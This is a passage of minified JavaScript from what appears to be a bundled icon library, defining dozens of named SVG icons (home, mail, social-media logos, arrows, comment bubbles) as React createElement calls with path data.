0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1v-1ZM4 18a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1v-1Zm6.5-13a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM17 5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Z"})),hamicon_6_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M10 12a2 2 0 1 1 4 0 2 2 0 0 1-4 0Zm0-7a2 2 0 1 1 4 0 2 2 0 0 1-4 0Zm0 14a2 2 0 1 1 4 0 2 2 0 0 1-4 0Z"})),happy_emoji_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 7a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V8a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1v1.5a1 1 0 0 1-2 0V8a1 1 0 0 1 1-1Zm-8 5.575a.675.675 0 0 0-.675.675 5.175 5.175 0 1 0 10.35 0 .675.675 0 0 0-.675-.675h-9Z",clipRule:"evenodd"})),heart_love_wishlist_favourite_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M20.433 5.288a5.797 5.797 0 0 0-8.198 0L12 5.523l-.235-.235a5.797 5.797 0 0 0-8.198 0 6.428 6.428 0 0 0 0 9.09l7.52 7.52a1.292 1.292 0 0 0 1.826 0l7.519-7.52a6.428 6.428 0 0 0 0-9.09Zm-4.169 1.285a1 1 0 1 0 0 2c.299 0 .595.114.822.341.323.323.46.76.41 1.183a1 1 0 0 0 1.986.234A3.43 3.43 0 0 0 18.5 7.5a3.156 3.156 0 0 0-2.236-.927Z",clipRule:"evenodd"})),hemicon_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h11.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hemicon_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hemicon_3_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h11.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h7.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hidden_hide_invisible_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M19.87 3.07a.75.75 0 0 1 1.06 1.061l-16.799 16.8a.75.75 0 0 1-1.06-1.06l1.857-1.859c-1.397-1.145-2.487-2.454-3.25-3.516a20.19 20.19 0 0 1-1.255-1.985 9.52 9.52 0 0 1-.067-.127l-.025-.049a.758.758 0 0 1 0-.673l.015-.03.016-.03.016-.03.007-.014a18.243 18.243 0 0 1 .72-1.217A20.435 20.435 0 0 1 3.33 7.486c1.938-2.067 4.873-4.237 8.672-4.238 2.269 0 4.231.778 5.852 1.84L19.87 3.07ZM8.874 14.067A3.73 3.73 0 0 1 8.25 12 3.75 3.75 0 0 1 12 8.25a3.73 3.73 0 0 1 2.066.624l-5.192 5.192Zm11.657-6.405c.205.008.397.1.533.253a20.672 20.672 0 0 1 1.933 2.583 17.693 17.693 0 0 1 .661 1.138l.01.019a.77.77 0 0 1 .004.68l-.016.03-.032.06-.007.014a18.22 18.22 0 0 1-.72 1.217 20.427 20.427 0 0 1-2.224 2.855c-1.938 2.067-4.872 4.237-8.672 4.237a9.97 9.97 0 0 1-3.243-.545.752.752 0 0 1-.277-1.25l11.5-11.082.057-.05a.753.753 0 0 1 .493-.16Z",clipRule:"evenodd"})),home_house_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21.75 19A2.75 2.75 0 0 1 19 21.75h-3.5A1.75 1.75 0 0 1 13.75 20v-5a.25.25 0 0 0-.25-.25h-3a.25.25 0 0 0-.25.25v5a1.75 1.75 0 0 1-1.75 1.75H5A2.75 2.75 0 0 1 2.25 19v-8.1c0-.786.336-1.534.923-2.056l7-6.223a2.75 2.75 0 0 1 3.654 0l7 6.223a2.75 2.75 0 0 1 .923 2.056V19Z"})),hourglass_timer_time_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M20 1.25a.75.75 0 0 1 0 1.5h-1.25v4.18c0 .92-.46 1.778-1.225 2.288L13.352 12l4.173 2.782a2.75 2.75 0 0 1 1.225 2.288v4.18H20a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1 0-1.5h1.25v-4.18c0-.92.46-1.778 1.225-2.288L10.648 12 6.475 9.218A2.75 2.75 0 0 1 5.25 6.93V2.75H4a.75.75 0 0 1 0-1.5h16ZM13.75 16.5a.75.75 0 0 0-.75-.75h-2a.75.75 0 0 0 0 1.5h2a.75.75 0 0 0 .75-.75Zm.75 2.25a.75.75 0 0 1 0 1.5h-5a.75.75 0 0 1 0-1.5h5Z",clipRule:"evenodd"})),instagram_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M9 12a3 3 0 1 1 6 0 3 3 0 0 1-6 0Z"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Zm12.5 5.5a1.25 1.25 0 1 0 0-2.5 1.25 1.25 0 0 0 0 2.5ZM12 7a5 5 0 1 0 0 10 5 5 0 0 0 0-10Z",clipRule:"evenodd"})),laptop_computer_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M2.75 15.25V6A2.75 2.75 0 0 1 5.5 3.25h13A2.75 2.75 0 0 1 21.25 6v9.25H2.75ZM13.5 6a1 1 0 1 1 0 2h-3a1 1 0 1 1 0-2h3ZM1.25 18v-1.25h21.5V18A2.75 2.75 0 0 1 20 20.75H4A2.75 2.75 0 0 1 1.25 18Z",clipRule:"evenodd"})),left_align_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18ZM11 20a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h8Zm10-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18ZM11 8a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h8Z"})),left_triangle_angle_arrow_backward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M17.75 19c0 1.442-1.646 2.265-2.8 1.4l-9.333-7a1.75 1.75 0 0 1 0-2.8l9.333-7c1.154-.865 2.8-.042 2.8 1.4v14Z"})),linkedin_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Zm11.15 16.792h2.893v-5.945c0-2.515-1.425-3.731-3.417-3.731-1.992 0-2.83 1.552-2.83 1.552V9.652h-2.79v9.389h2.79v-4.929c0-1.32.607-2.106 1.77-2.106 1.07 0 1.584.755 1.584 2.106v4.929ZM4.96 6.69c0 .957.77 1.732 1.72 1.732s1.719-.775 1.719-1.732-.77-1.733-1.72-1.733S4.96 5.733 4.96 6.69Zm3.188 12.35H5.24V9.654h2.908v9.389Z",clipRule:"evenodd"})),link_chains_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M6.264 9.281a1 1 0 0 1 1.415 1.415L5.165 13.21a3.977 3.977 0 1 0 5.625 5.625l2.514-2.514a1 1 0 0 1 1.415 1.414l-2.515 2.514a5.977 5.977 0 1 1-8.453-8.453L6.264 9.28Zm5.532-5.53a5.977 5.977 0 1 1 8.453 8.453l-2.514 2.515a1 1 0 0 1-1.414-1.415l2.514-2.514a3.977 3.977 0 1 0-5.625-5.625l-2.514 2.514a1.001 1.001 0 0 1-1.415-1.414l2.515-2.514Z"}),(0,o.createElement)("path",{d:"M13.793 8.793a1 1 0 1 1 1.414 1.414l-5 5a1 1 0 0 1-1.414-1.414l5-5Z"})),location_gps_map_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11.625 22.65 12 22l.375.65a.75.75 0 0 1-.75 0Z"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M11.625 22.65 12 22c.375.65.376.649.376.649l.002-.001.006-.004.02-.012.034-.02.04-.024a19.765 19.765 0 0 0 1.212-.814 22.44 22.44 0 0 0 2.847-2.456c2.058-2.11 4.213-5.239 4.213-9.113 0-4.928-3.9-8.955-8.75-8.955s-8.75 4.027-8.75 8.955c0 3.874 2.155 7.002 4.213 9.113a22.436 22.436 0 0 0 3.788 3.101 12.961 12.961 0 0 0 .344.213l.021.012.006.004.003.001ZM12 6.25a3.75 3.75 0 1 0 0 7.5 3.75 3.75 0 0 0 0-7.5Z",clipRule:"evenodd"})),long_arrow_up_top_increase_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11 21V10H6a1 1 0 0 1-.707-1.707l6-6 .076-.068a1 1 0 0 1 1.338.068l6 6A1 1 0 0 1 18 10h-5v11a1 1 0 1 1-2 0Z"})),mail_email_messege_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M4 3.25A2.75 2.75 0 0 0 1.25 6v12A2.75 2.75 0 0 0 4 20.75h16A2.75 2.75 0 0 0 22.75 18V6A2.75 2.75 0 0 0 20 3.25H4ZM6.6 7.2a1 1 0 1 0-1.2 1.6l4.8 3.6a3 3 0 0 0 3.6 0l4.8-3.6a1 1 0 0 0-1.2-1.6l-4.8 3.6a1 1 0 0 1-1.2 0L6.6 7.2Z",clipRule:"evenodd"})),media_document_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M2.25 19V5A2.75 2.75 0 0 1 5 2.25h10.172c.73 0 1.429.29 1.944.806l3.828 3.828a2.75 2.75 0 0 1 .806 1.944V19A2.75 2.75 0 0 1 19 21.75H5A2.75 2.75 0 0 1 2.25 19ZM15 15.5a1 1 0 0 0-1-1H8a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-2-7a1 1 0 0 0-1-1H8a1 1 0 0 0 0 2h4a1 1 0 0 0 1-1Zm4 3.5a1 1 0 0 0-1-1H8a1 1 0 1 0 0 2h8a1 1 0 0 0 1-1Z"})),messege_comment_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M22.75 16A2.75 2.75 0 0 1 20 18.75H7.264l-4.795 3.836A.75.75 0 0 1 1.25 22V7A2.75 2.75 0 0 1 4 4.25h16A2.75 2.75 0 0 1 22.75 7v9ZM14 9.75a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h4a1 1 0 0 0 1-1Zm1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M22.75 15A2.75 2.75 0 0 1 20 17.75h-6.236l-4.795 3.836A.75.75 0 0 1 7.75 21v-3.25H4A2.75 2.75 0 0 1 1.25 15V6A2.75 2.75 0 0 1 4 3.25h16A2.75 2.75 0 0 1 22.75 6v9ZM14 8.75a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h4a1 1 0 0 0 1-1Zm1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_3_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M4 3.25A2.75 2.75 0 0 0 1.25 6v9A2.75 2.75 0 0 0 4 17.75h3.75V21a.75.75 0 0 0 1.219.586l4.794-3.836H20A2.75 2.75 0 0 0 22.75 15V6A2.75 2.75 0 0 0 20 3.25H4ZM9 10a1 1 0 0 0-2 0v1a1 1 0 1 0 2 0v-1Zm3-1a1 1 0 0 1 1 1v1a1 1 0 1 1-2 0v-1a1 1 0 0 1 1-1Zm5 1a1 1 0 1 0-2 0v1a1 1 0 1 0 2 0v-1Z",clipRule:"evenodd"})),messege_comment_4_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M22.75 15A2.75 2.75 0 0 1 20 17.75h-6.236l-4.795 3.836A.75.75 0 0 1 7.75 21v-3.25H4A2.75 2.75 0 0 1 1.25 15V6A2.75 2.75 0 0 1 4 3.25h16A2.75 2.75 0 0 1 22.75 6v9Z"})),messege_comment_5_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M21.75 12A9.75 9.75 0 0 1 12 21.75H3a.75.75 0 0 1-.75-.75v-9c0-5.385 4.365-9.75 9.75-9.75s9.75 4.365 9.75 9.75ZM16 10.25a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_6_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M17 3.25A5.75 5.75 0 0 1 22.75 9v7a.75.75 0 0 1-.75.75h-5.31a4.75 4.75 0 0 1-4.69 4H2a.75.75 0 0 1-.75-.75v-6a4.751 4.751 0 0 1 4-4.691V9A5.75 5.75 0 0 1 11 3.25h6ZM5.25 10.838A3.25 3.25 0 0 0 2.75 14v5.25H12a3.25 3.25 0 0 0 3.162-2.5H11A5.75 5.75 0 0 1 5.25 11v-.162ZM11 10.75a1 1 0 1 0 0 2h6a1 1 0 1 0 0-2h-6Zm0-3.5a1 1 0 1 0 0 2h4a1 1 0 1 0 0-2h-4Z",clipRule:"evenodd"})),messege_comment_7_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M22.75 11.5c0 5.218-4.932 9.25-10.75 9.25-.921 0-1.817-.101-2.672-.29l-2.956 1.691A.75.75 0 0 1 5.25 21.5v-2.8c-2.411-1.675-4-4.258-4-7.2 0-5.218 4.932-9.25 10.75-9.25s10.75 4.032 10.75 9.25ZM16 10.25a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-2 2.5a1 1 0 1 1 0 2h-4a1 1 0 1 1 0-2h4Z",clipRule:"evenodd"})),messege_comment_8_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M14.5 3.25c4.542 0 8.25 3.613 8.25 8.102 0 2.519-1.172 4.764-3 6.247V20a.75.75 0 0 1-1.163.626l-2.13-1.404a8.41 8.41 0 0 1-1.957.231 8.323 8.323 0 0 1-4.61-1.382 7.867 7.867 0 0 1-3.075-.06l-1.82 1.127A.75.75 0 0 1 3.85 18.5v-1.87c-1.576-1.222-2.6-3.07-2.6-5.157C1.25 7.7 4.557 4.75 8.5 4.75c.319 0 .634.02.942.057a.755.755 0 0 1 .15.033A8.318 8.318 0 0 1 14.5 3.25ZM8.08 6.265c-3.03.195-5.33 2.505-5.33 5.208 0 1.68.878 3.196 2.276 4.162a.75.75 0 0 1 .324.617v.903l.943-.583a.75.75 0 0 1 .587-.086c.45.12.925.188 1.416.203A7.98 7.98 0 0 1 8.08 6.265Z",clipRule:"evenodd"})),messenger_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M1.25 11.677C1.25 5.687 5.945 1.25 12 1.25s10.75 4.44 10.75 10.43c0 5.99-4.695 10.427-10.75 10.427a11.75 11.75 0 0 1-3.112-.414.864.864 0 0 0-.575.043l-2.134.94a.86.86 0 0 1-1.207-.76l-.059-1.913a.85.85 0 0 0-.288-.613c-2.09-1.87-3.375-4.58-3.375-7.713Zm7.452-1.959-3.157 5.01c-.304.48.287 1.02.739.677l3.391-2.575a.644.644 0 0 1 .777-.003l2.513 1.884a1.612 1.612 0 0 0 2.332-.43l3.161-5.006c.301-.481-.29-1.024-.742-.68l-3.391 2.574a.644.644 0 0 1-.777.003l-2.513-1.884a1.613 1.613 0 0 0-2.333.43Z",clipRule:"evenodd"})),microsoft_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11.25 2.25v9h-9V5A2.75 2.75 0 0 1 5 2.25h6.25Zm1.5 0v9h9V5A2.75 2.75 0 0 0 19 2.25h-6.25Zm9 10.5h-9v9H19A2.75 2.75 0 0 0 21.75 19v-6.25Zm-10.5 9v-9h-9V19A2.75 2.75 0 0 0 5 21.75h6.25Z"})),middle_align_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18Zm-5 18a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h8Zm5-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18Zm-5-6a1 1 0 1 1 0 2H8a1 1 0 0 1 0-2h8Z"})),mobile_smartphone_phone_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M17 22.75A2.75 2.75 0 0 0 19.75 20V4A2.75 2.75 0 0 0 17 1.25H7A2.75 2.75 0 0 0 4.25 4v16A2.75 2.75 0 0 0 7 22.75h10ZM13.5 4a1 1 0 1 1 0 2h-3a1 1 0 1 1 0-2h3Z",clipRule:"evenodd"})),pause_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M2.25 5A2.75 2.75 0 0 1 5 2.25h2.5A2.75 2.75 0 0 1 10.25 5v14a2.75 2.75 0 0 1-2.75 2.75H5A2.75 2.75 0 0 1 2.25 19V5Zm11.5 0a2.75 2.75 0 0 1 2.75-2.75H19A2.75 2.75 0 0 1 21.75 5v14A2.75 2.75 0 0 1 19 21.75h-2.5A2.75 2.75 0 0 1 13.75 19V5Z",clipRule:"evenodd"})),pinterest_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12c0 4.554 2.833 8.448 6.832 10.014-.094-.85-.178-2.159.038-3.087.195-.84 1.26-5.344 1.26-5.344s-.321-.644-.321-1.596c0-1.495.866-2.61 1.945-2.61.917 0 1.36.688 1.36 1.514 0 .922-.587 2.301-.89 3.579-.254 1.07.536 1.943 1.592 1.943 1.91 0 3.379-2.015 3.379-4.923 0-2.574-1.85-4.374-4.49-4.374-3.06 0-4.855 2.295-4.855 4.665 0 .925.356 1.915.8 2.454.088.106.101.2.075.308-.082.34-.263 1.07-.298 1.22-.047.196-.156.238-.36.143-1.343-.625-2.182-2.588-2.182-4.165 0-3.39 2.464-6.505 7.103-6.505 3.729 0 6.627 2.657 6.627 6.209 0 3.705-2.336 6.686-5.578 6.686-1.09 0-2.114-.566-2.464-1.234 0 0-.54 2.053-.67 2.555-.243.934-.898 2.105-1.336 2.819A10.76 10.76 0 0 0 12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25Z"})),play_media_video_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 22.75c5.936 0 10.75-4.813 10.75-10.75S17.936 1.25 12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75ZM10.416 7.376A.75.75 0 0 0 9.25 8v8a.75.75 0 0 0 1.166.624l6-4a.75.75 0 0 0 0-1.248l-6-4Z",clipRule:"evenodd"})),price_tag_label_category_sale_discount_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M21.444 13.616a2.75 2.75 0 0 0 .806-1.944V3.5a1.75 1.75 0 0 0-1.75-1.75h-8.172c-.73 0-1.429.29-1.945.806l-8 8a2.75 2.75 0 0 0 0 3.888l7.172 7.172a2.75 2.75 0 0 0 3.889 0l8-8ZM8.707 12.293a1 1 0 1 0-1.414 1.414l3 3 .076.068a1 1 0 0 0 1.406-1.406l-.068-.076-3-3ZM18 7.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z",clipRule:"evenodd"})),price_tag_offer_sale_coupon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M18.796 6.963c-.367 1.048-1.172 1.993-2.432 2.693a.75.75 0 1 1-.728-1.311c.99-.55 1.517-1.229 1.744-1.878a2.583 2.583 0 0 0-.1-1.941c-.55-1.208-1.999-2.11-3.853-1.618-2.791.74-6.15 1.333-9.695-.024a.75.75 0 1 1 .536-1.401c3.09 1.183 6.062.695 8.774-.025 2.566-.68 4.75.577 5.603 2.445.425.933.517 2.017.151 3.06Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M19.74 7.294c-.46 1.313-1.45 2.436-2.89 3.236a1.75 1.75 0 1 1-1.7-3.06c.81-.45 1.152-.95 1.286-1.333a1.59 1.59 0 0 0-.066-1.197 1.835 1.835 0 0 0-.101-.19h-4.44c-.73 0-1.43.29-1.945.805l-6.5 6.5a2.75 2.75 0 0 0 0 3.89l6.171 6.171a2.75 2.75 0 0 0 3.89 0l6.5-6.5a2.75 2.75 0 0 0 .805-1.944V6.5c0-.598-.3-1.127-.759-1.442.083.73.01 1.49-.252 2.236Zm-8.71 5.176a.75.75 0 0 0-1.06 1.06l2 2a.75.75 0 0 0 1.06-1.06l-2-2Zm-2.5 1.5a.75.75 0 0 0-1.06 1.06l3 3a.75.75 0 0 0 1.06-1.06l-3-3Z",clipRule:"evenodd"})),reddit_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M13.875 4.75h2.354a2.751 2.751 0 1 0 0-1.5h-2.354A2.75 2.75 0 0 0 11.125 6v2.028c-1.76.115-3.39.571-4.771 1.281a2.875 2.875 0 1 0-3.964 4.109A5.777 5.777 0 0 0 2 15.5C2 19.642 6.477 23 12 23s10-3.358 10-7.5c0-.722-.136-1.421-.39-2.082a2.875 2.875 0 1 0-3.963-4.109C16.2 8.566 14.48 8.1 12.624 8.014V6c0-.69.56-1.25 1.25-1.25ZM9 14.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm0 2.97a.75.75 0 0 0-1.06 1.06c.954.955 2.57 1.345 4.03 1.345 1.46 0 3.075-.39 4.03-1.345a.75.75 0 0 0-1.06-1.06c-.546.545-1.68.905-2.97.905-1.29 0-2.424-.36-2.97-.905ZM16.5 13a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z",clipRule:"evenodd"})),refresh_reset_cycle_loop_infinity_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M3 21v-5a1 1 0 0 1 1-1h5a1 1 0 1 1 0 2H5.756A7.977 7.977 0 0 0 12 20a8 8 0 0 0 8-8 1 1 0 1 1 2 0c0 5.523-4.477 10-10 10a9.967 9.967 0 0 1-7-2.863V21a1 1 0 1 1-2 0Zm-1-9C2 6.477 6.477 2 12 2a9.966 9.966 0 0 1 7 2.86V3a1 1 0 1 1 2 0v5a1 1 0 0 1-1 1h-5a1 1 0 1 1 0-2h3.245A8 8 0 0 0 4 12a1 1 0 1 1-2 0Z"})),restriction_no_stop_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM6.383 19.03A9 9 0 0 0 19.03 6.383L6.383 19.03ZM12 3a9 9 0 0 0-7.031 14.616L17.616 4.97A8.96 8.96 0 0 0 12 3Z",clipRule:"evenodd"})),right_align_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18Zm0 18a1 1 0 1 1 0 2h-8a1 1 0 1 1 0-2h8Zm0-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18Zm0-6a1 1 0 1 1 0 2h-8a1 1 0 1 1 0-2h8Z"})),right_triangle_angle_play_arrow_forward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M6.25 5c0-1.442 1.646-2.265 2.8-1.4l9.334 7c.933.7.933 2.1 0 2.8l-9.334 7c-1.154.865-2.8.042-2.8-1.4V5Z"})),search_magnify_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M16.618 18.032a9 9 0 1 1 